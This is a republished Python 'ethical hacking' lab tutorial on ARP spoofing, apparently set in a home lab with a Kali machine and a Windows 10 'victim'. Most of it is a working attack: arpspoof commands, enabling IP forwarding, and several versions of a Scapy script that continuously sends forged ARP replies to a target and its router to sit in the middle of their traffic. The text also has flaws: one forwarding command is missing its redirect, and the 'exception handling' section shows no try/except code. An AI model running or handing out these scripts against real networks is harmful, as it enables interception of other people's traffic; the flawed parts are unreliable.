编程语言
首页 > 编程语言> > Python Ethical Hacking - ARP Spoofing(1)

Python Ethical Hacking - ARP Spoofing(1)

作者:互联网

Typical Network

ARP Spoofing

Why ARP Spoofing is possible:

1. Clients accept responses even if they did not send a request.

2. Clients trust response without any form of verification.

1. Run the following command on the victim - Windows 10 Machine.

arp -a

2. Run the following command on the Kali Linux machine.

arp -a

3. Use the tool arpspoof on the Kali Linux to perform the test.

arpspoof -i eth1 -t 10.0.0.210 10.0.0.1

arpspoof -i eth1 -t 10.0.0.1 10.0.0.210

3. Perform the following command again on the victim Windows 10 machine. The MAC address of the router changed to the MAC address of Kali Linux.

arp -a

4. Run the command on Kali Linux.

echo 1 > /proc/sys/net/ipv4/ip_forward

4. Find useful information on the Kali and write the Python code.

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
print(packet.show())
print(packet.summary())

Result:

 

Python Script:

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
scapy.send(packet)

Execute the script on Kali and watch the change on the victim Windows 10 machine.

 

Rewrite the Python Script.

#!/usr/bin/env python

import scapy.all as scapy

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")

Execute the script and watch the change on victim Windows 10 machine.

 

Rewrite the Python script to perform the spoof continuously.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    time.sleep(2)

Enable the IP forward on Kali Linux.

echo 1 /proc/sys/net/ipv4/ip_forward

Now the target Win10 machine can browse the Internet normally.

 

 

 Use the while structure to show the packets sent count.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("[+] Packets sent:" + str(sent_packets_count))
    time.sleep(2)

 Execute the Python script.

 

Rewrite the Python Script in Python2:

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execute the new script and find the change in the terminal.

 

Rewrite the script in Python3 compatibility :

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count), end="")
    time.sleep(2)

 

HANDLING EXCEPTIONS

-> if an error occurs exception block gets executed, otherwise try code gets executed.

 

Using the try ... catch structure to handle the KeyboardInterrupt Error.

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("\r[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execution result:

 

标签:Ethical,target,10.0,Python,ip,scapy,ff,Hacking,spoof
来源: https://www.cnblogs.com/keepmoving1113/p/11368916.html